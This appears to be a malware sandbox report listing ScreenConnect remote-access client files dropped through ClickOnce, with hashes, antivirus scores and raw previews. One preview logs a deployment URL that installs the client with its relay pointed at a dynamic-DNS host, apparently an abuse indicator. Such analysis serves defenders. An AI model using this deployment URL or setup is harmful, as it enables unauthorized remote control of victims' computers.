                                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\62C6HAPT.log

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with very long lines (618), with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):14968
                                                                                                                                                                                                                                                        Entropy (8bit):3.818129733327157
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:t6BKasddrv5yInMSiYkbBBaOy0lPsddrv5yInMSiY3uEM1dE/58+kxpsddrv5yIW:nj5y8VkbaBj5y8VeEMPE9j5y8VNJLEv
                                                                                                                                                                                                                                                        MD5:DFC4AE709D05AB3AD6763E4DA93F0034
                                                                                                                                                                                                                                                        SHA1:7F244226A9BCF0E716F0881F57FF28AAC40BF8A9
                                                                                                                                                                                                                                                        SHA-256:D783A7EFCDA54618FE932B8CD674F86CB81ADDEA943FC59189EB1988941FE9BE
                                                                                                                                                                                                                                                        SHA-512:34E8EEF237968286F6F219D75D690F496FAC73416D496732FEA2A68D236E7B79362120962BC9632F401373616C9E9749C0B03227D6C78A60296EEC6ACDDF81C7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:..P.L.A.T.F.O.R.M. .V.E.R.S.I.O.N. .I.N.F.O.......W.i.n.d.o.w.s. .......:. .1.0...0...1.9.0.4.5...0. .(.W.i.n.3.2.N.T.).......C.o.m.m.o.n. .L.a.n.g.u.a.g.e. .R.u.n.t.i.m.e. ...:. .4...0...3.0.3.1.9...4.2.0.0.0.......S.y.s.t.e.m...D.e.p.l.o.y.m.e.n.t...d.l.l. .....:. .4...8...4.2.7.0...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......c.l.r...d.l.l. .......:. .4...8...4.5.1.5...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......d.f.d.l.l...d.l.l. .......:. .4...8...4.2.7.0...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......d.f.s.h.i.m...d.l.l. .......:. .1.0...0...1.9.0.4.1...3.0.0.0.0. .(.W.i.n.B.u.i.l.d...1.6.0.1.0.1...0.8.0.0.).........S.O.U.R.C.E.S.......D.e.p.l.o.y.m.e.n.t. .u.r.l.......:. .h.t.t.p.s.:././.s.e.c.u.r.e...s.t.a.n.s.u.p...c.o.m./.B.i.n./.S.c.r.e.e.n.C.o.n.n.e.c.t...C.l.i.e.n.t...a.p.p.l.i.c.a.t.i.o.n.?.e.=.S.u.p.p.o.r.t.&.y.=.G.u.e.s.t.&.h.=.k.j.h.2.3.1.a...z.a.p.t.o...o.r.g.&.p.=.8.0.4.1.&.s.=.4.1.b.b.4.5.1.f.-.2.1.e.9.-.4.1.6.5.-.b.8.b.

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\ATCJGV5C.AJP\B8PVKCMA.Z7R.application

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63849), with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):118229
                                                                                                                                                                                                                                                        Entropy (8bit):5.585370839513735
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3072:r7N8cT51/FXvMVNWfCXq9ymfm2o9HuzhJOvP:r6cfiVIBmt8vOvP
                                                                                                                                                                                                                                                        MD5:14CBFC8E1EE96D3503274F68DB7280B9
                                                                                                                                                                                                                                                        SHA1:964378CACB140A0771934E0D4B6EEEB18EE17B99
                                                                                                                                                                                                                                                        SHA-256:490F27B351F34197BEA76860091B7EBAB90F8427BD79C95889D2A12222C5CC00
                                                                                                                                                                                                                                                        SHA-512:410605A4400CA3A5C3F90E998755B5D76013E2314990A51F6F08150E8CC370FB8EC14F3F2B3D180B61322489D7F2672C0AB70F9EC7E4A6CE1566BBAE77A6AE2E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.3.8936" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tru

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.Client.dll

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):197120
                                                                                                                                                                                                                                                        Entropy (8bit):6.584712994459805
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3072:mxGtNaldxI5KY9h12MMusqVFJRJcyzvfquFzDvJXYyB:1tNalc5fr12MbPJY8quFGy
                                                                                                                                                                                                                                                        MD5:4D94014D41DE954AEE952C1B930BA395
                                                                                                                                                                                                                                                        SHA1:35A776D4B569C5367F61A68A577CE92086E682E2
                                                                                                                                                                                                                                                        SHA-256:AD8FC048CE7A61C1AF0428B7B3989163A215A9378417CAC6FBF232D0538405C3
                                                                                                                                                                                                                                                        SHA-512:0ACA355B24FAF86B6C321E88321EFF542F277331745010C3A495AAE6F2F123E518284CB7445F78A83BCE3A61BDFFD1AA3FC082E7DC854218B5D7AF95478414F8
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5............" ..0.................. ... ....... .......................`......].....@.................................-...O.... ..|....................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...|.... ......................@..@.reloc.......@......................@..B................a.......H...........(............^................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=...*..0...........~*...%-.&~).....|...s&...%.*...(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.Client.dll.genman

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1039
                                                                                                                                                                                                                                                        Entropy (8bit):5.154101033983839
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:MMHdF4XZ8i9o9olxbv5NEgVkP0AJR7vNxW57FpS+iENg49vNxW5NgMCNg49vNxWO:JdFYZ8h9onRigeP0AKvSkcyMwcVSkTo
                                                                                                                                                                                                                                                        MD5:CD5FD6DC905D01654E81EAD73F6CE116
                                                                                                                                                                                                                                                        SHA1:9A3ED5183F323F33C37755B90B45D401D45AC46C
                                                                                                                                                                                                                                                        SHA-256:51F959457A28D492E123B6B2982865716E8A811CF43DE856033C24CE34C0B187
                                                                                                                                                                                                                                                        SHA-512:25CA0DBBC602C6B61ACA7DA840A2353FD8C5C7FB3B311544DDCC3B1936B3A0F72A93D32E38093AB8B30935211EB4D260EC766EA5C9FBD90D50740EACA54BC052
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependent

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.ClientService.dll

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):68096
                                                                                                                                                                                                                                                        Entropy (8bit):6.069003835678311
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:vA0ZscQ5V6TsQqoSDih6+39QFVIl1LJhb8gF:o0Zy3IUOQFVQLJF
                                                                                                                                                                                                                                                        MD5:47C0BF8CC60128C530A930637822EA78
                                                                                                                                                                                                                                                        SHA1:6FBAF1C36AF7DFCA4B4970A9F71C1DCD8B7A57F9
                                                                                                                                                                                                                                                        SHA-256:EA71F7DCBE7E754EEF4ED40A931EDA12FEF7063B173A5B1D5095F683B254504C
                                                                                                                                                                                                                                                        SHA-512:D2CBF3BCC53D0D340984617867F22CB43CE5A336B7B844E2F339B308FF28C955F5F3C7217C5ECDFE509B45DBD519BD733C3C9B9C6B8ABA945B8E6A288B495B17
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....k............" ..0.............. ... ...@....... ....................................@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....i...s....%.,...(...+*vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.ClientService.dll.genman

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1632
                                                                                                                                                                                                                                                        Entropy (8bit):5.092740375848212
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:JdFYZ8h9onRzgeP0AW+vSkcyMwcbEMwcuMwcVSkcf5bdTo:3FYZ8h9o9gI0AWCHMwTMw3MwGAXTo
                                                                                                                                                                                                                                                        MD5:219DBCD947D7BBDF0BBC78778286B8C7
                                                                                                                                                                                                                                                        SHA1:E95D66F48C130644CE421CBBBFCF3D376FEBAC4E
                                                                                                                                                                                                                                                        SHA-256:C92BB401516771F702CD0986219589CA90E7DE089C8CF4DD825D904985299796
                                                                                                                                                                                                                                                        SHA-512:9E147F80D629AA00C4E0CB8DB708635BA6C14FDE30B8A5574927197352747B43B063060EB4D201C2B4AC984A9F4C84F5F774EB29DE481A0FEE572FB7B0C31F13
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" version=

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.ClientService.exe

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):95520
                                                                                                                                                                                                                                                        Entropy (8bit):6.504144260093153
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:Sg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoU0HMu7axl:jhbNDxZGXfdHrX7rAc6myJkgoU0HVI
                                                                                                                                                                                                                                                        MD5:200A917996F0FC74879076354454473A
                                                                                                                                                                                                                                                        SHA1:15886A7D4385D7EC4F7C8837D7218D46E5B3DD9C
                                                                                                                                                                                                                                                        SHA-256:0B2824097ABE3211AAC5FEDA8DC4D300BA51801D9FBED9EB8330B433A66AC001
                                                                                                                                                                                                                                                        SHA-512:B9133EA853AAF6BB2F5EFD7B65A4559701C37D992D8E9CC79BF181CD8CECF0D436077278DDD87725FB5E59BB2962D0FBC111BF0C7E1C760688D01BA4FA4F003E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.................................+.....@.................................p...x....`..P............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...P....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.Core.dll

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):548352
                                                                                                                                                                                                                                                        Entropy (8bit):6.045519732283216
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6144:YtkHq9BVYKH062PQHz0k4NbuI2Tt1QsEaVQQUzxmj8/lmQpnGGlsGdmACEhHkG5Y:YNpZZasEbJ0OnGGlNkuMHCzzdU
                                                                                                                                                                                                                                                        MD5:D0B5084C680C798B5340D2E61CA5E06C
                                                                                                                                                                                                                                                        SHA1:C4F4DE6B77589A8D853F565C99DEF5DBFB230725
                                                                                                                                                                                                                                                        SHA-256:D933498CD929C57AAB0C3AF908E0FE617213DD67C13E39B2A1D68B8F21849A7A
                                                                                                                                                                                                                                                        SHA-512:E14E32D981F4926FE80A4C45D5DFCDCDC3B78DC63556FFBFB4DCE61C2818E6AA2FD5BACC5734970BDE017AC3FDCF0E24FABCC68C1C99C98A84095394E46391B5
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...iB............" ..0..V...........p... ........... ....................................@.................................qp..O.......t............................o..8............................................ ............... ..H............text....T... ...V.................. ..`.rsrc...t............X..............@..@.reloc...............\..............@..B.................p......H........B...,..................To........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.Core.dll.genman

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1215
                                                                                                                                                                                                                                                        Entropy (8bit):5.132426421892876
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:JdFYZ8h9onR+geP0AqvSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0AmGVETDTo
                                                                                                                                                                                                                                                        MD5:7836CB4BB4AA3204BE8BCB1998653762
                                                                                                                                                                                                                                                        SHA1:555EBD513BB5C4EE073415FD71F24D0697038F6D
                                                                                                                                                                                                                                                        SHA-256:F1E8F85E0495160BBA92E1B89C8C5A1BE51E5F7CC289212CBBAF6FC6141B4076
                                                                                                                                                                                                                                                        SHA-512:B18CC8779DCF15AB7DA2604F4D48E53870FE84E22B1CEE34AF9CC9D9B5B7A0CC5AABF11CC08CADD137A8CAA86451326A770B5FAC727E84E9721206649E4AE7A7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssemb

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.Windows.dll

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1721856
                                                                                                                                                                                                                                                        Entropy (8bit):6.638253108372186
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24576:qGPFFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPTsUTM:DPFJkGYYpT0+TFiH7efP
                                                                                                                                                                                                                                                        MD5:F4E602A8A0FD88FF3FFDAC946C21E567
                                                                                                                                                                                                                                                        SHA1:1B9D9F1581F780485A325A35DCD29A16B213591C
                                                                                                                                                                                                                                                        SHA-256:2AB4FB595844C11F27A54402C37197C96FA8E92FCC5D63B43D4810A4891EFBC7
                                                                                                                                                                                                                                                        SHA-512:6DFFC1EF67CC474FC7DCE358A7E3297EBAB4456B88A3A172F0E4BA65C5EE8DD6F67611296DBC8F478B7A3E2ED714E412A26BEF84D19E1B36AD0754BD693CF00B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..>...........\... ...`....... ...............................o....@.................................?\..O....`..|............................[..8............................................ ............... ..H............text....<... ...>.................. ..`.rsrc...|....`.......@..............@..@.reloc...............D..............@..B................s\......H.......H..................0....[........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.Windows.dll.genman

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1980
                                                                                                                                                                                                                                                        Entropy (8bit):5.059741759134869
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:JdFYZ8h9onRbggeP0AIvSkcyMwcVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AEHMwGQAXRTFgTo
                                                                                                                                                                                                                                                        MD5:22FE4BC3BB143D14D2142E096955F9B7
                                                                                                                                                                                                                                                        SHA1:332597F5A4D2D3724DCFDA19AF7734846CEDF474
                                                                                                                                                                                                                                                        SHA-256:39D81BE76E978E5D6BF4DC5F74226E48FA4EA77780A6792CAB947C5D20D4A6AA
                                                                                                                                                                                                                                                        SHA-512:508660E83C75AD55A11CDDC6381547536A4CBB5A4A940D3D17F77AD256C9943360650750343FE32C86F6DC462273AEAE68E40903F2C33A0AD9F09D393FB1B59F
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsBackstageShell.exe

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):61216
                                                                                                                                                                                                                                                        Entropy (8bit):6.311801757323114
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:EW/+lo6MOc8IoiKWj8Nv8DtyQ4RE+TC6GAhVby97sxd:ELlo6dcclCyQGGn9G
                                                                                                                                                                                                                                                        MD5:C754141304DE3EBAD8ECEEA033356AD6
                                                                                                                                                                                                                                                        SHA1:6AC5D18F1525878FA83E5A93F606AFC58DC7D949
                                                                                                                                                                                                                                                        SHA-256:B1B8A3AD61C1ECED612C442442CC2CF73E2E4B81ACFC8EDFDB3DDEEBAE1E6D78
                                                                                                                                                                                                                                                        SHA-512:81C3B134A2C7C591607ACAC6F9C7881BF0BC194903339534943D65DF49E904BC7FAEEA2A350A4314E28DB2C913C2183C9D3ECF6CA03EB082F5EA461D1E4A6333
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
